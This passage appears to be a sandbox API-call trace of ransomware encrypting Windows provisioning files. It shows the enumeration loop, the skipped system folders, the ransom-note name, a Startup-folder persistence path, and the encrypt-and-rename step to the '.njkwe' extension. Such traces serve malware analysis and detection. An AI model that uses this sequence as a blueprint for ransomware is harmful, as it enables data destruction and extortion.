lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x35b, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x35b, lpOverlapped=0x0) returned 1 [0078.198] GetProcessHeap () returned 0xbe0000 [0078.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.198] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.198] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.198] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.198] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.199] CloseHandle (hObject=0x43c) returned 1 [0078.199] GetProcessHeap () returned 0xbe0000 [0078.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.199] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 189 [0078.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\30__connections_cellular_t-mobile austria (austria)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\30__connections_cellular_t-mobile austria (austria)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.199] GetProcessHeap () returned 0xbe0000 [0078.199] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.199] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b85519, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b85519, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b85519, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml", cAlternateFileName="310__C~1.PRO")) returned 1 [0078.199] lstrcmpiW (lpString1="310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.199] lstrcmpiW (lpString1="310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.199] lstrcmpiW (lpString1="310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.202] lstrcmpiW (lpString1="310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.202] lstrcmpiW (lpString1="310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.202] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml") returned 159 [0078.202] StrStrIW (lpFirst="310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.202] lstrcmpW (lpString1="310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.202] lstrcmpW (lpString1="310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.202] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\310__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.202] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\310__connections_cellular_netcom (norway)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.203] GetTickCount () returned 0x1153e1f [0078.203] GetTickCount () returned 0x1153e1f [0078.203] GetTickCount () returned 0x1153e1f [0078.203] GetTickCount () returned 0x1153e1f [0078.203] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.203] GetProcessHeap () returned 0xbe0000 [0078.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.203] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x28b, lpOverlapped=0x0) returned 1 [0078.204] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd75, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.204] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x28b, lpOverlapped=0x0) returned 1 [0078.205] GetProcessHeap () returned 0xbe0000 [0078.205] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.205] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.205] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.205] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.205] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.205] CloseHandle (hObject=0x43c) returned 1 [0078.205] GetProcessHeap () returned 0xbe0000 [0078.205] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.205] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0078.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\310__connections_cellular_netcom (norway)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\310__Connections_Cellular_NetCom (Norway)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\310__connections_cellular_netcom (norway)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.206] GetProcessHeap () returned 0xbe0000 [0078.206] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.206] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b85519, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b85519, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b85519, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml", cAlternateFileName="311__C~1.PRO")) returned 1 [0078.206] lstrcmpiW (lpString1="311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.206] lstrcmpiW (lpString1="311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.206] lstrcmpiW (lpString1="311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.206] lstrcmpiW (lpString1="311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.206] lstrcmpiW (lpString1="311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.206] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml") returned 163 [0078.206] StrStrIW (lpFirst="311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.206] lstrcmpW (lpString1="311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.206] lstrcmpW (lpString1="311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.206] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\311__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.206] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\311__connections_cellular_tdc norway (norway)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.206] GetTickCount () returned 0x1153e1f [0078.206] GetTickCount () returned 0x1153e1f [0078.206] GetTickCount () returned 0x1153e1f [0078.206] GetTickCount () returned 0x1153e1f [0078.207] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.207] GetProcessHeap () returned 0xbe0000 [0078.207] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.207] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0078.208] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.208] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0078.208] GetProcessHeap () returned 0xbe0000 [0078.208] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.208] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.208] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.208] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.209] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.209] CloseHandle (hObject=0x43c) returned 1 [0078.209] GetProcessHeap () returned 0xbe0000 [0078.209] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.209] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\311__connections_cellular_tdc norway (norway)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\311__Connections_Cellular_TDC Norway (Norway)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\311__connections_cellular_tdc norway (norway)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.209] GetProcessHeap () returned 0xbe0000 [0078.209] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.209] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b85519, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b85519, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b85519, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml", cAlternateFileName="312__C~1.PRO")) returned 1 [0078.209] lstrcmpiW (lpString1="312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.210] lstrcmpiW (lpString1="312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.210] lstrcmpiW (lpString1="312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.210] lstrcmpiW (lpString1="312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.210] lstrcmpiW (lpString1="312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.210] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml") returned 160 [0078.210] StrStrIW (lpFirst="312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.210] lstrcmpW (lpString1="312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.210] lstrcmpW (lpString1="312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.210] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\312__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.210] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\312__connections_cellular_telenor (norway)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.210] GetTickCount () returned 0x1153e1f [0078.210] GetTickCount () returned 0x1153e1f [0078.210] GetTickCount () returned 0x1153e1f [0078.210] GetTickCount () returned 0x1153e1f [0078.210] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.210] GetProcessHeap () returned 0xbe0000 [0078.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.210] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x285, lpOverlapped=0x0) returned 1 [0078.212] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.212] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x285, lpOverlapped=0x0) returned 1 [0078.212] GetProcessHeap () returned 0xbe0000 [0078.212] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.212] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.212] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.212] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.212] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.212] CloseHandle (hObject=0x43c) returned 1 [0078.212] GetProcessHeap () returned 0xbe0000 [0078.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.212] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0078.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\312__connections_cellular_telenor (norway)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\312__Connections_Cellular_Telenor (Norway)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\312__connections_cellular_telenor (norway)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.213] GetProcessHeap () returned 0xbe0000 [0078.213] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.213] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bab788, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90bab788, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90bab788, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="313__Connections_Cellular_Omani Qatari Telecommunications Company SAOC (Oman)_i0$(__MVID)@WAP.provxml", cAlternateFileName="313__C~1.PRO")) returned 1 [0078.213] lstrcmpiW (lpString1="313__Connections_Cellular_Omani Qatari Telecommunications Company SAOC (Oman)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.213] lstrcmpiW (lpString1="313__Connections_Cellular_Omani Qatari Telecommunications Company SAOC (Oman)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.213] lstrcmpiW (lpString1="313__Connections_Cellular_Omani Qatari Telecommunications Company SAOC (Oman)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.213] lstrcmpiW (lpString1="313__Connections_Cellular_Omani Qatari Telecommunications Company SAOC (Oman)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.213] lstrcmpiW (lpString1="313__Connections_Cellular_Omani Qatari Telecommunications Company SAOC (Oman)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.213] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\313__Connections_Cellular_Omani Qatari Telecommunications Company SAOC (Oman)_i0$(__MVID)@WAP.provxml") returned 195 [0078.213] StrStrIW (lpFirst="313__Connections_Cellular_Omani Qatari Telecommunications Company SAOC (Oman)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.213] lstrcmpW (lpString1="313__Connections_Cellular_Omani Qatari Telecommunications Company SAOC (Oman)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.213] lstrcmpW (lpString1="313__Connections_Cellular_Omani Qatari Telecommunications Company SAOC (Oman)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.213] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\313__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.213] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\313__Connections_Cellular_Omani Qatari Telecommunications Company 